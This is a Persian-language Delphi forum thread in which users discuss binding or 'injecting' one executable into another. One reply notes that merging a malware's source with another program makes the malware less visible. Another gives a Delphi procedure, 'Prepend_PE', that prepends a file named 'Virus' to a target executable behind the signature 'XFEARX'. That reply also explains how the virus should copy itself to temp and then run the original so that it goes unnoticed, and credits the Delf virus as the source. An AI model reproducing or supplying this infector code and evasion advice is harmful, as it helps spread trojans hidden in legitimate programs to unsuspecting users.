سلام، من یه فایل اجرایی(exe) دارم که می خوام به برنامه خودم که با زبان دلفی نوشته شده تزریق کنم. چی کار کنم؟ ممنون می شم راهنمایی ام کنید.
Printable View
سلام، من یه فایل اجرایی(exe) دارم که می خوام به برنامه خودم که با زبان دلفی نوشته شده تزریق کنم. چی کار کنم؟ ممنون می شم راهنمایی ام کنید.
سلام رفیق.
من خودم Inject بلد نیستم! اما یه سورس برات Up کرد ببین به کارت میاد.دوست دارم یاد بگیرم.
اگه خواستی دوتا exe رو بهم بچسبونی من درخدمتتم.
http://www.uplod.ir/download.php?file=486176
موفق باشی.
سلام، شاید منظور من همون چسبوندن بود. چون یکی از exe ها خیلی کوچیک بود گفتم «تزریق». اگه میشه راهنمایی کنید.
سلام. لطفاً منو بیشتر راهنمایی کنید. :لبخندساده:
با سلام
از برنامه های Binder استفاده کن .
به این کار میگن Bind کردن نه Inject .
اگه یک بدافزار یه طرف قضیه هست و سورس هر دو برنامه رو هم داری سورس رو با هم یکی کن کم تر خودشو نشون میده .
موفق باشید
سلام
یه تابع برات گذاشتم ماله قدیماست.
این کد فقط چسبوندنه دو تا peاست نه چیزه دیگه.فقط اسمهای متغیر ها بدن.:شیطان::لبخند:
فایله ویروس (pe1)می خواد خودش رو به DestinationFileبچسبونه.
فاصله بین دو فایل با یه Signature که L هست مشخص میشه.
L : STRING= 'XFEARX';
موفق باشید.
Procedure Prepend_PE(:شیطان:Virus,DestinationFile:STRIN G);
LABEL
Abort_Pe;
Var
T : STRING;
myFile : File;
byteArray : array[1..8] of byte;
oneByte : byte;
count : Integer;
I : WORD;
F : FILE;
G : FILE;
Buffer1 : ARRAY [0..2048] OF Byte;
Buffer2 : ARRAY [0..2048] OF Byte;
Buf : ARRAY [1..2048] OF Byte;
begin
//DestinationFile:='FileTest\DestinationFile.exe';
//Virus:='FileTest\Virus.exe';
T:=LowerCase(L);
CopyFile(pChar(DestinationFile),pChar(DestinationF ile+'.tmp'),False);
CopyFile(pChar(Virus),pChar(DestinationFile),False );
FileMode:=2; //Read And Write
AssignFile(F,DestinationFile);
AssignFile(G,DestinationFile+'.tmp');
Reset(F,1); //open And Definr Block=1 byte// Now we define one record as 1 byte
IF IOResult<>0 THEN
Begin
// ShowMessage('CantOpen DestinationFile File');
Abort;//Cant pen The File
End;
Reset(G,1);
IF IOResult<>0 THEN
Begin
ShowMessage('CantOpen DestinationFile.TMP File');
Abort;
End;
Seek(F,FileSize(F)); //Goto End Of File
BlockWrite(F,T[1],6);//write 6 byte to F //Write Signature End Of File
REPEAT
BlockRead(G,Buf[1],2048,Count);//Read TempFile From Khune 1 ta count //
BlockWrite(F,Buf[1],Count);//write Into Destination File From 1 To Count //
UNTIL Count=0;
CloseFile(G);
Reset(f, 1);
while not Eof(f) do
begin
BlockRead(f, oneByte, 1); // Read one byte at a time
end;
CloseFile(f);
ShowMessage('Prepend Finished');
end;
//---------
ظاهرا" میچسبونه ولی قابلیت اجرایی نداره ! درسته ؟
سلامنقل قول:
نوشته شده توسط Nima NT
منظورتون رو نميفهمم!
رفیق این کد میاد دوتا exe رو بهم میچسبونه و فایله تولیدی قابلیت اجرا داره. حالا برای اجرای PE2 شما باید PE اولیتون(virus) که ابتدا قرار گرفته بعد از اجرا شدن خودش رو تو temp کپی کنه بعد PE2 رو از رو Signatur پیدا کنه و اجرا کنه! طوری که اصلان PE اولی در کار نبوده.
چون کارمندم و همش ماموریتمو در حاله نصبه ویندوز و عوض کردن پاور و بلور گرفتن داخل کیس هام ،هفت ای یکبار وقت میکنم دلفی باز کنم ،به همین خاطر این کد ها رو یادم رفتن. اینا رو از رو ویروسه Delf یاد گرفتم و ترکیب کردم.
سلام، لطفاً در مورد نحوه پیدا کردن signature اگه کدی دارید، بذارید ممنون می شم. چون به صورت رمز در میاد من نمی تونم پیداش کنم. :اشتباه: